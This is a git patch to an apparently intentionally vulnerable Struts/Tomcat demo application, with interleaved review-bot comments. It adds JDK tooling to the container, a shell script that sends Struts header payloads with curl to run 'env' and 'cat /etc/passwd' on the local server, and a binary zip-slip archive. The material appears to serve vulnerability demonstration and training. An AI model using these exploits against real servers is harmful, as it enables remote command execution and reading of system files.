From 23633bff1f9b8c58fceb936977f75514761ce0bb Mon Sep 17 00:00:00 2001
From: bmvermeer
Date: Wed, 20 Oct 2021 09:52:18 +0200
Subject: [PATCH] added native2ascii to container and made exploits work
---
 Dockerfile | 2 ++
 exploits/struts-exploit-docker-tomcat.sh | 4 ++++
 exploits/zipslip-docker-tomcat.zip | Bin 0 -> 425 bytes
 3 files changed, 6 insertions(+)
 create mode 100755 exploits/struts-exploit-docker-tomcat.sh
 create mode 100644 exploits/zipslip-docker-tomcat.zip

diff --git a/Dockerfile b/Dockerfile
index ab073e6c47..bbc40a06de 100644
--- a/Dockerfile
+++ b/Dockerfile
@@ -10,3 +10,5 @@ FROM tomcat:8.5.21
 RUN mkdir /tmp/extracted_files
 COPY --chown=tomcat:tomcat web.xml /usr/local/tomcat/conf/web.xml
 COPY --from=build /usr/src/goof/todolist-web-struts/target/todolist.war /usr/local/tomcat/webapps/todolist.war
+COPY --from=build /usr/local/openjdk-8/bin/native2ascii /docker-java-home/jre/bin/native2ascii
+COPY --from=build /usr/local/openjdk-8/lib/tools.jar /docker-java-home/jre/lib/tools.jar
\ No newline at end of file
diff --git a/exploits/struts-exploit-docker-tomcat.sh b/exploits/struts-exploit-docker-tomcat.sh
new file mode 100755
index 0000000000..cb2bccf6ff
--- /dev/null
+++ b/exploits/struts-exploit-docker-tomcat.sh
@@ -0,0 +1,4 @@
+# Struts exploit using curl and httpie (more colourful HTTP client)
+# (runs 'env' or 'cat /etc/passwd', can replace env with any other command (note to escape slashes and double quotes)
+cat struts-exploit-headers.txt| sed "s/COMMAND/env/" | xargs curl -v -X GET http://localhost:8080/todolist/ -H
+cat struts-exploit-headers.txt| sed "s/COMMAND/cat \/etc\/passwd/" | xargs curl -v -X GET http://localhost:8080/todolist/ -H 
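Review bot: The two added COPY lines put JDK-only tooling (native2ascii and tools.jar) into what the destination paths suggest is a JRE-only runtime image, and nothing in the Dockerfile records why — the commit title is the only hint that this exists to make the bundled demo exploits work. A comment above them such as `# Intentionally ships JDK tooling (native2ascii, tools.jar) in the runtime image so the demo exploits work; not a pattern to copy into production images` would keep a later cleanup from silently breaking the demo and stop a reader from lifting the lines into a real service image. The second added line also leaves the file without a trailing newline (`\ No newline at end of file`), so the next append will show as a two-line diff. The enclosing build stage (`FROM tomcat:8.5.21`) begins outside the hunk.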
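Review bot: The new script is created executable (mode 100755) but has no interpreter line, so running it as `./struts-exploit-docker-tomcat.sh` depends on the calling shell's no-shebang fallback rather than a declared interpreter; add `#!/usr/bin/env bash` as the first line. The header comment names httpie, yet both commands use curl only, so it should read `# Struts demo request using curl against the local todolist container (requires struts-exploit-headers.txt in the current directory)`. The `cat struts-exploit-headers.txt| sed "s/COMMAND/env/"` stage can be written as `sed "s/COMMAND/env/" struts-exploit-headers.txt`, and since the header file is opened relative to the working directory the script only works when launched from the exploits/ directory, which the comment should say.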
diff --git a/exploits/zipslip-docker-tomcat.zip b/exploits/zipslip-docker-tomcat.zip new file mode 100644 index 0000000000000000000000000000000000000000..af8621d46b7b23f241a5ac75700b52dde24cdc69 GIT binary patch literal 425 zcmWIWW@Zs#;Nak3@Ny3cWBANqldmoKp3JAdGZf|74#rGZRfS8>PXO_KrIDFt>F zBa;XN!js4@26++{z`Pvbjj9XTM38R~z!%6Q#$!M=MENbio0Sb@Iuj6X0Md^^90mY? CG+dbg literal 0 HcmV?d00001